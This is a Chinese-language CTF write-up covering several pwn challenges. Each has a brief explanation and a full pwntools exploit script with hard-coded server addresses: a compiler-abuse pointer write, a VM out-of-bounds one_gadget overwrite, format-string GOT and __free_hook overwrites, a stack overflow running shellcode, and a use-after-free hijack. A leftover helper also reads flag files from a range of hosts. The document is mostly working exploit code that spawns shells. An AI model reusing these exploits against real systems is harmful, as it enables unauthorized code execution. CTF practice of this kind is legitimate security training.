总的来说,我个人对这四场比赛的评价就是简单的太简单,难的太难,直接难成cve。我裂开
青龙组
boom1:
这个就直接是个C的编译器。
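from PwnContext import *
from pwn import *

context.log_level = 'debug'


# Wrappers around the PwnContext `ctx` object (from the wildcard import).
# They were lambdas bound to names; plain defs keep the same signatures and
# return values.  Every payload goes through str() -- this is a Python 2
# script, where str() of a packed value is the raw byte string.
# NOTE(review): under Python 3, str(bytes) is the repr ("b'...'"), so the
# bytes on the wire would differ -- confirm the interpreter before reuse.
def s(data):
    """Send str(data)."""
    return ctx.send(str(data))


def sa(delim, data):
    """Wait for str(delim), then send str(data)."""
    return ctx.sendafter(str(delim), str(data))


def sl(data):
    """Send str(data) followed by a newline."""
    return ctx.sendline(str(data))


def sla(delim, data):
    """Wait for str(delim), then send str(data) plus a newline."""
    return ctx.sendlineafter(str(delim), str(data))


def r(numb=4096):
    """Receive, passing `numb` as the size argument."""
    return ctx.recv(numb)


def ru(delims, drop=True):
    """Receive up to `delims`; `drop` controls whether the delimiter is kept."""
    return ctx.recvuntil(delims, drop)


def irt():
    """Hand the connection over to the interactive console."""
    return ctx.interactive()


def rs(*args, **kwargs):
    """Start the target; arguments are forwarded to ctx.start()."""
    return ctx.start(*args, **kwargs)


def dbg(gs='', **kwargs):
    """Attach the debugger, with `gs` as the gdb script."""
    return ctx.debug(gdbscript=gs, **kwargs)


def uu32(data):
    """Unpack up to 4 bytes as a u32, zero-padding the tail."""
    return u32(data.ljust(4, '\x00'))


def uu64(data):
    """Unpack up to 8 bytes as a u64, zero-padding the tail."""
    return u64(data.ljust(8, '\x00'))


def leak(name, addr):
    """Log `addr` in hex under the label `name`."""
    return log.success('{} = {:#x}'.format(name, addr))


ctx.binary = 'boom1'
# The host's own libc; ctx.debug_remote_libc stays False, so nothing is
# fetched for the remote target and symbol offsets only hold when the
# target runs the same libc build.
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
ctx.debug_remote_libc = False
# Read by choice(): non-zero runs the binary locally, zero connects to the
# remote service.
local = 0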
def choice():
    """Start the target: a local process when `local` is truthy, otherwise
    a connection to the challenge host recorded in ctx.remote."""
    if not local:
        ctx.remote = ('182.92.73.10', 24573)
        return rs('remote')
    return rs()
choice()
# C source handed to the challenge's compiler (the writeup describes boom1
# as a C compiler).  The pointer arithmetic relies on hard-coded addresses
# (presumably captured while debugging), so the program is tied to that
# exact memory layout and is not re-derived at run time.
payload = ''' char *a; char *b; char *buf; int main() { a = "whali3n51"; b = a - (0x7F8FE6E5C028 - 0x7F8FE6933000); a = b + 0x5f0f48- 0xf08 + 8; a[0] = 0; a = b + 0x5f0f48; buf = 0xCD0F3 + b; a[0] = (buf)&0xFF; a[1] = (buf>>8)&0xFF; a[2] = (buf>>16)&0xFF; printf("%p %p %p",b,buf,*(int *)a); }'''
# Newlines are stripped so the whole program is submitted as a single line.
payload = payload.replace('\n','')
sl(payload)
irt()
boom2:
这个是一个简单的VM,数组能越界,然后拿到栈上的数据,通过加减法,让指针指向libc_start_main,然后在计算一下将调整一下值,让libc_start_main变成onegadget的值,然后写到libc_start_main的地方。
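from PwnContext import *
from pwn import *

context.log_level = 'debug'


# Wrappers around the PwnContext `ctx` object (from the wildcard import).
# They were lambdas bound to names; plain defs keep the same signatures and
# return values.  Every payload goes through str() -- this is a Python 2
# script, where str() of a packed value is the raw byte string.
# NOTE(review): under Python 3, str(bytes) is the repr ("b'...'"), so the
# bytes on the wire would differ -- confirm the interpreter before reuse.
def s(data):
    """Send str(data)."""
    return ctx.send(str(data))


def sa(delim, data):
    """Wait for str(delim), then send str(data)."""
    return ctx.sendafter(str(delim), str(data))


def sl(data):
    """Send str(data) followed by a newline."""
    return ctx.sendline(str(data))


def sla(delim, data):
    """Wait for str(delim), then send str(data) plus a newline."""
    return ctx.sendlineafter(str(delim), str(data))


def r(numb=4096):
    """Receive, passing `numb` as the size argument."""
    return ctx.recv(numb)


def ru(delims, drop=True):
    """Receive up to `delims`; `drop` controls whether the delimiter is kept."""
    return ctx.recvuntil(delims, drop)


def irt():
    """Hand the connection over to the interactive console."""
    return ctx.interactive()


def rs(*args, **kwargs):
    """Start the target; arguments are forwarded to ctx.start()."""
    return ctx.start(*args, **kwargs)


def dbg(gs='', **kwargs):
    """Attach the debugger, with `gs` as the gdb script."""
    return ctx.debug(gdbscript=gs, **kwargs)


def uu32(data):
    """Unpack up to 4 bytes as a u32, zero-padding the tail."""
    return u32(data.ljust(4, '\x00'))


def uu64(data):
    """Unpack up to 8 bytes as a u64, zero-padding the tail."""
    return u64(data.ljust(8, '\x00'))


def leak(name, addr):
    """Log `addr` in hex under the label `name`."""
    return log.success('{} = {:#x}'.format(name, addr))


ctx.binary = 'boom2'
# The host's own libc; ctx.debug_remote_libc stays False, so nothing is
# fetched for the remote target and symbol offsets only hold when the
# target runs the same libc build.
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
ctx.debug_remote_libc = False
# Read by choice(): non-zero runs the binary locally, zero connects to the
# remote service.
local = 0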
def choice():
    """Start the target: a local process when `local` is truthy, otherwise
    a connection to the challenge host recorded in ctx.remote."""
    if not local:
        ctx.remote = ('182.92.73.10', 36642)
        return rs('remote')
    return rs()
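def debug():
    """Print the libc base and attach the debugger with breakpoints at
    0x920 and 0xA3E.

    NOTE(review): unlike the other scripts on this page this has no
    `local == 1` guard; it is never called in this listing.
    """
    libc_base = ctx.bases.libc
    # print() with a single argument parses under both Python 2 and 3.
    print(hex(libc_base))
    ctx.symbols = {'sym1': 0x920, 'sym2': 0xA3E}
    ctx.breakpoints = [0x920, 0xA3E]
    ctx.debug()


# Program for the challenge VM: fourteen 8-byte words.  The values are the
# writeup's own and depend on the target's libc layout.  The listing was
# collapsed, so the top-level placement is inferred from the later
# sa("code>", payload), which needs the name at module scope.
payload = (p64(1) + p64(0xffffffffffffff18) + p64(13) + p64(0)
           + p64(0xfffffffffffffffc) + p64(9) + p64(25) + p64(13)
           + p64(9) + p64(13) + p64(1) + p64(854295) + p64(25) + p64(11))

choice()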
# Deliver the VM program once the "code>" prompt appears, then go
# interactive.
sa("code>",payload)
irt()
faster0:
这个kirin给了思路,但是我tcl,不会使用angr来爆破。无果,以后有时间学学angr吧,感觉用来盲打挺不错的。
白虎组
这一场很无语,一个cve,一个隐写附件,让人误以为没有附件,我无语,记录一下其他pwn吧。
pwn2:
很简单的思路,直接格式化字符串修改got表为调用system的地方
还有一种思路利用可以用%*X$d%Y$n来把栈中X处的值赋给栈中偏移Y处的指针指向的地址。利用这种方式,可以用来满足条件。
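from PwnContext import *
from pwn import *

context.log_level = 'debug'


# Wrappers around the PwnContext `ctx` object (from the wildcard import).
# They were lambdas bound to names; plain defs keep the same signatures and
# return values.  Every payload goes through str() -- this is a Python 2
# script, where str() of a packed value is the raw byte string.
# NOTE(review): under Python 3, str(bytes) is the repr ("b'...'"), so the
# bytes on the wire would differ -- confirm the interpreter before reuse.
def s(data):
    """Send str(data)."""
    return ctx.send(str(data))


def sa(delim, data):
    """Wait for str(delim), then send str(data)."""
    return ctx.sendafter(str(delim), str(data))


def sl(data):
    """Send str(data) followed by a newline."""
    return ctx.sendline(str(data))


def sla(delim, data):
    """Wait for str(delim), then send str(data) plus a newline."""
    return ctx.sendlineafter(str(delim), str(data))


def r(numb=4096):
    """Receive, passing `numb` as the size argument."""
    return ctx.recv(numb)


def ru(delims, drop=True):
    """Receive up to `delims`; `drop` controls whether the delimiter is kept."""
    return ctx.recvuntil(delims, drop)


def irt():
    """Hand the connection over to the interactive console."""
    return ctx.interactive()


def rs(*args, **kwargs):
    """Start the target; arguments are forwarded to ctx.start()."""
    return ctx.start(*args, **kwargs)


def dbg(gs='', **kwargs):
    """Attach the debugger, with `gs` as the gdb script."""
    return ctx.debug(gdbscript=gs, **kwargs)


def uu32(data):
    """Unpack up to 4 bytes as a u32, zero-padding the tail."""
    return u32(data.ljust(4, '\x00'))


def uu64(data):
    """Unpack up to 8 bytes as a u64, zero-padding the tail."""
    return u64(data.ljust(8, '\x00'))


def leak(name, addr):
    """Log `addr` in hex under the label `name`."""
    return log.success('{} = {:#x}'.format(name, addr))


ctx.binary = 'pwn2'
# The host's own libc; ctx.debug_remote_libc stays False, so nothing is
# fetched for the remote target and symbol offsets only hold when the
# target runs the same libc build.
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
ctx.debug_remote_libc = False
# Read by choice() and debug(): as posted (1) the binary runs locally with
# the debugger attached; 0 connects to the remote service instead.
local = 1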
def choice():
    """Start the target: a local process when `local` is truthy, otherwise
    a connection to the challenge host recorded in ctx.remote."""
    if not local:
        ctx.remote = ('123.57.225.26', 15246)
        return rs('remote')
    return rs()
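def debug():
    """Attach the debugger when running locally (`local == 1`).

    Prints the libc base and registers one symbol/breakpoint at 0x804876A
    before calling ctx.debug().  Does nothing in the remote case.
    """
    if local == 1:
        libc_base = ctx.bases.libc
        # print() with a single argument parses under both Python 2 and 3.
        print(hex(libc_base))
        ctx.symbols = {'sym1': 0x804876A}
        ctx.breakpoints = [0x804876A]
        ctx.debug()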
choice()
# Two prompts: the first gets a packed 4-byte address (0x804A028), the
# second a %c/%hn format string directed at argument 20.  Both values are
# specific to this binary's layout and are not derived at run time.
sla("FirstName:",p32(0x804A028))
sa("LastName:","%35291c%20$hn")
irt()
pwn3:
sosososo easy的一题,他啥保护都没有开,直接eip劫持了,调用read,写入shellcode,然后控制eip,指向shellcode即可。
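from PwnContext import *
from pwn import *

context.log_level = 'debug'


# Wrappers around the PwnContext `ctx` object (from the wildcard import).
# They were lambdas bound to names; plain defs keep the same signatures and
# return values.  Every payload goes through str() -- this is a Python 2
# script, where str() of a packed value is the raw byte string.
# NOTE(review): under Python 3, str(bytes) is the repr ("b'...'"), so the
# bytes on the wire would differ -- confirm the interpreter before reuse.
def s(data):
    """Send str(data)."""
    return ctx.send(str(data))


def sa(delim, data):
    """Wait for str(delim), then send str(data)."""
    return ctx.sendafter(str(delim), str(data))


def sl(data):
    """Send str(data) followed by a newline."""
    return ctx.sendline(str(data))


def sla(delim, data):
    """Wait for str(delim), then send str(data) plus a newline."""
    return ctx.sendlineafter(str(delim), str(data))


def r(numb=4096):
    """Receive, passing `numb` as the size argument."""
    return ctx.recv(numb)


def ru(delims, drop=True):
    """Receive up to `delims`; `drop` controls whether the delimiter is kept."""
    return ctx.recvuntil(delims, drop)


def irt():
    """Hand the connection over to the interactive console."""
    return ctx.interactive()


def rs(*args, **kwargs):
    """Start the target; arguments are forwarded to ctx.start()."""
    return ctx.start(*args, **kwargs)


def dbg(gs='', **kwargs):
    """Attach the debugger, with `gs` as the gdb script."""
    return ctx.debug(gdbscript=gs, **kwargs)


def uu32(data):
    """Unpack up to 4 bytes as a u32, zero-padding the tail."""
    return u32(data.ljust(4, '\x00'))


def uu64(data):
    """Unpack up to 8 bytes as a u64, zero-padding the tail."""
    return u64(data.ljust(8, '\x00'))


def leak(name, addr):
    """Log `addr` in hex under the label `name`."""
    return log.success('{} = {:#x}'.format(name, addr))


ctx.binary = 'pwn3'
# The host's own libc; ctx.debug_remote_libc stays False, so nothing is
# fetched for the remote target and symbol offsets only hold when the
# target runs the same libc build.
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
# Set explicitly so asm()/shellcraft later in the script assemble for amd64.
context.arch = 'amd64'
ctx.debug_remote_libc = False
# Read by choice() and debug(): non-zero runs the binary locally, zero
# connects to the remote service.
local = 0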
def catflag(i):
    """List the remote directory, read the flag file and append it to `f`.

    NOTE(review): neither `f` nor `ip` is defined anywhere in this script,
    so the last line raises NameError; the function is never called in
    this listing and looks like a leftover from another file.
    """
    sl('ls')
    sleep(1)
    r()
    sl("cat /flag*")
    flag=r()
    f.write("172.17.135."+ip[i]+' '+flag)
def choice():
    """Start the target: a local process when `local` is truthy, otherwise
    a connection to the challenge host recorded in ctx.remote."""
    if not local:
        ctx.remote = ('123.57.225.26', 42435)
        return rs('remote')
    return rs()
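def debug():
    """Attach the debugger when running locally (`local == 1`).

    Prints the libc base and registers two symbols/breakpoints (0xEDA,
    0x10AF) before calling ctx.debug().  Does nothing in the remote case.
    NOTE(review): these offsets are identical to the ones in the other
    pwn3 script on this page -- confirm they belong to this binary.
    """
    if local == 1:
        libc_base = ctx.bases.libc
        # print() with a single argument parses under both Python 2 and 3.
        print(hex(libc_base))
        ctx.symbols = {'sym1': 0xEDA, 'sym2': 0x10AF}
        ctx.breakpoints = [0xEDA, 0x10AF]
        ctx.debug()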
choice()
# 0x78 bytes of filler followed by four 8-byte values (0x4006a3, 0x601500,
# 0x4004D0, 0x601500); all four are fixed addresses for this binary.  The
# second line sends the shellcraft.sh() payload assembled for context.arch.
payload="1"*0x78+p64(0x00000000004006a3)+p64(0x601500)+p64(0x4004D0)+p64(0x601500)
sl(payload)
sl(asm(shellcraft.sh()))
irt()
朱雀组
format:
看似很复杂,其实很简单的格式化字符串利用,改写__free_hook,直接getshell。
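# The original imported PwnContext twice (before and after pwn).  The
# duplicate is dropped; the order below keeps the same final namespace
# (PwnContext's names still shadow pwn's, LibcSearcher's shadow both).
from pwn import *
from PwnContext import *
from LibcSearcher import *

context.log_level = 'debug'


# Wrappers around the PwnContext `ctx` object (from the wildcard import).
# They were lambdas bound to names; plain defs keep the same signatures and
# return values.  Every payload goes through str() -- this is a Python 2
# script, where str() of a packed value is the raw byte string.
# NOTE(review): under Python 3, str(bytes) is the repr ("b'...'"), so the
# bytes on the wire would differ -- confirm the interpreter before reuse.
def s(data):
    """Send str(data)."""
    return ctx.send(str(data))


def sa(delim, data):
    """Wait for str(delim), then send str(data)."""
    return ctx.sendafter(str(delim), str(data))


def sl(data):
    """Send str(data) followed by a newline."""
    return ctx.sendline(str(data))


def sla(delim, data):
    """Wait for str(delim), then send str(data) plus a newline."""
    return ctx.sendlineafter(str(delim), str(data))


def r(numb=4096):
    """Receive, passing `numb` as the size argument."""
    return ctx.recv(numb)


def ru(delims, drop=True):
    """Receive up to `delims`; `drop` controls whether the delimiter is kept."""
    return ctx.recvuntil(delims, drop)


def irt():
    """Hand the connection over to the interactive console."""
    return ctx.interactive()


def rs(*args, **kwargs):
    """Start the target; arguments are forwarded to ctx.start()."""
    return ctx.start(*args, **kwargs)


def dbg(gs='', **kwargs):
    """Attach the debugger, with `gs` as the gdb script."""
    return ctx.debug(gdbscript=gs, **kwargs)


def uu32(data):
    """Unpack up to 4 bytes as a u32, zero-padding the tail."""
    return u32(data.ljust(4, '\x00'))


def uu64(data):
    """Unpack up to 8 bytes as a u64, zero-padding the tail."""
    return u64(data.ljust(8, '\x00'))


def leak(name, addr):
    """Log `addr` in hex under the label `name`."""
    return log.success('{} = {:#x}'.format(name, addr))


ctx.binary = 'format'
# The host's own libc.  Its symbol offsets are added to a base computed
# from a remote leak later in the script; with ctx.debug_remote_libc False
# nothing is fetched for the target, so a different remote libc build
# silently yields wrong addresses.
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
ctx.debug_remote_libc = False
# Read by choice() and debug(): as posted (1) the binary runs locally with
# the debugger attached; 0 connects to the remote service instead.
local = 1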
def choice():
    """Start the target: a local process when `local` is truthy, otherwise
    a connection to the challenge host recorded in ctx.remote."""
    if not local:
        ctx.remote = ('59.110.243.101', 25413)
        return rs('remote')
    return rs()
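def debug():
    """Attach the debugger when running locally (`local == 1`).

    Prints the libc base and registers one symbol/breakpoint at 0x0FB5
    before calling ctx.debug().  Does nothing in the remote case.
    """
    if local == 1:
        libc_base = ctx.bases.libc
        # print() with a single argument parses under both Python 2 and 3.
        print(hex(libc_base))
        ctx.symbols = {'sym1': 0x0FB5}
        ctx.breakpoints = [0x0FB5]
        ctx.debug()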
def menu(index):
    """Answer the ">" prompt with `index` (sent through str())."""
    sla(">",index)

# create/show/edit/free wrap the numbered menu options; the run further
# down drives the program through menu() directly and does not use them.
def create(size):
    """Option 1, then `size` at the "size: " prompt."""
    menu(1)
    sla("size: ",size)

def show(index):
    """Option 2, then `index` at the "id: " prompt."""
    menu(2)
    sla("id: ",index)

def edit(index,content):
    """Option 3: `index` at "id: ", then raw `content` after "content: "."""
    menu(3)
    sla("id: ",index)
    sa("content: ",content)

def free(index):
    """Option 4, then `index` at the "id: " prompt."""
    menu(4)
    sla("id: ",index)

def exp(index):
    # NOTE(review): `catflag` and `i` are not defined in this script, so
    # calling this raises NameError.  It is never invoked in this listing
    # and looks like a leftover from another file.
    print "exploition"
    catflag(i)
choice()
# debug() attaches gdb only when local == 1, which is the value set in
# this listing, so the run below expects a local session.
debug()
# Leak: write a %35$p format into entry 2 and read it back; everything up
# to "0x" is discarded and the next 12 hex digits are the pointer.
menu("vim 2")
menu("%35$p")
menu("cat 2")
ru('0x')
# The subtrahend is the distance between the leaked pointer and the libc
# base as observed in one debugging session (0x7ffff7... addresses).  It is
# specific to that libc build; with a different target libc the computed
# base -- and every address derived from it -- is silently wrong.
libc_base=int(r(12),16)-(0x7ffff7a2d830-0x7ffff7a0d000)
leak("libc_base",libc_base)
system=libc_base+libc.symbols['system']
free_hook=libc_base+libc.symbols['__free_hook']
# Three partial (%hn, 16-bit) writes through argument 11, each paired with
# a target address at free_hook, free_hook+2 and free_hook+4.
menu("vim 2")
menu("%"+str(system&0xffff)+"c%11$hn")
menu("cat 2aaa"+p64(free_hook))
menu("vim 2")
menu("%"+str((system>>16)&0xffff)+"c%11$hn")
menu("cat 2aaa"+p64(free_hook+2))
menu("vim 2")
menu("%"+str((system>>32)&0xffff)+"c%11$hn")
menu("cat 2aaa"+p64(free_hook+4))
# Entry 1 receives "/bin/sh" and is then removed.
menu("vim 1")
menu("/bin/sh\x00")
menu("rm 1")
irt()
pwn3:
UAF漏洞,直接劫持puts指针为后门函数地址就可以了。
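from PwnContext import *
from pwn import *

context.log_level = 'debug'


# Wrappers around the PwnContext `ctx` object (from the wildcard import).
# They were lambdas bound to names; plain defs keep the same signatures and
# return values.  Every payload goes through str() -- this is a Python 2
# script, where str() of a packed value is the raw byte string.
# NOTE(review): under Python 3, str(bytes) is the repr ("b'...'"), so the
# bytes on the wire would differ -- confirm the interpreter before reuse.
def s(data):
    """Send str(data)."""
    return ctx.send(str(data))


def sa(delim, data):
    """Wait for str(delim), then send str(data)."""
    return ctx.sendafter(str(delim), str(data))


def sl(data):
    """Send str(data) followed by a newline."""
    return ctx.sendline(str(data))


def sla(delim, data):
    """Wait for str(delim), then send str(data) plus a newline."""
    return ctx.sendlineafter(str(delim), str(data))


def r(numb=4096):
    """Receive, passing `numb` as the size argument."""
    return ctx.recv(numb)


def ru(delims, drop=True):
    """Receive up to `delims`; `drop` controls whether the delimiter is kept."""
    return ctx.recvuntil(delims, drop)


def irt():
    """Hand the connection over to the interactive console."""
    return ctx.interactive()


def rs(*args, **kwargs):
    """Start the target; arguments are forwarded to ctx.start()."""
    return ctx.start(*args, **kwargs)


def dbg(gs='', **kwargs):
    """Attach the debugger, with `gs` as the gdb script."""
    return ctx.debug(gdbscript=gs, **kwargs)


def uu32(data):
    """Unpack up to 4 bytes as a u32, zero-padding the tail."""
    return u32(data.ljust(4, '\x00'))


def uu64(data):
    """Unpack up to 8 bytes as a u64, zero-padding the tail."""
    return u64(data.ljust(8, '\x00'))


def leak(name, addr):
    """Log `addr` in hex under the label `name`."""
    return log.success('{} = {:#x}'.format(name, addr))


ctx.binary = 'pwn3'
# The host's own libc; ctx.debug_remote_libc stays False, so nothing is
# fetched for the remote target and symbol offsets only hold when the
# target runs the same libc build.
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
ctx.debug_remote_libc = False
# Read by choice() and debug(): as posted (1) the binary runs locally with
# the debugger attached; 0 connects to the remote service instead.
local = 1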
def choice():
    """Start the target: a local process when `local` is truthy, otherwise
    a connection to the challenge host recorded in ctx.remote."""
    if not local:
        ctx.remote = ('59.110.243.101', 54621)
        return rs('remote')
    return rs()
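def debug():
    """Attach the debugger when running locally (`local == 1`).

    Prints the libc base and registers two symbols/breakpoints (0xEDA,
    0x10AF) before calling ctx.debug().  Does nothing in the remote case.
    NOTE(review): these offsets are identical to the ones in the other
    pwn3 script on this page -- confirm they belong to this binary.
    """
    if local == 1:
        libc_base = ctx.bases.libc
        # print() with a single argument parses under both Python 2 and 3.
        print(hex(libc_base))
        ctx.symbols = {'sym1': 0xEDA, 'sym2': 0x10AF}
        ctx.breakpoints = [0xEDA, 0x10AF]
        ctx.debug()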
def menu(index):
    """Reply to the "Your choice :" prompt with `index`."""
    sla("Your choice :", index)


def _pick(option, prompt, value):
    """Select menu `option`, then answer `prompt` with `value`."""
    menu(option)
    sla(prompt, value)


def create(size, content):
    """Option 1: `size` at the cost prompt, then raw `content` at the name prompt."""
    _pick(1, "magic cost ?:", size)
    sa("name :", content)


def show(index):
    """Option 3: display the entry at `index`."""
    _pick(3, "index :", index)


def free(index):
    """Option 2: release the entry at `index`."""
    _pick(2, "index :", index)
choice()
# Two entries are created and both freed; a new entry of the first size
# then supplies p64(0x1231212)+p64(0x400A0D) as its content and entry 0 is
# shown.  0x400A0D is a fixed address in this binary (presumably the
# backdoor function the writeup refers to).
create(0x10,"1231231")
create(0x20,"1232123")
free(0)
free(1)
create(0x10,p64(0x1231212)+p64(0x400A0D))
show(0)
irt()
玄武组
个人认为本组最难,因为考研要复习,这场没有打,而且应该全部是通过angr盲打求解来解题,个人不会。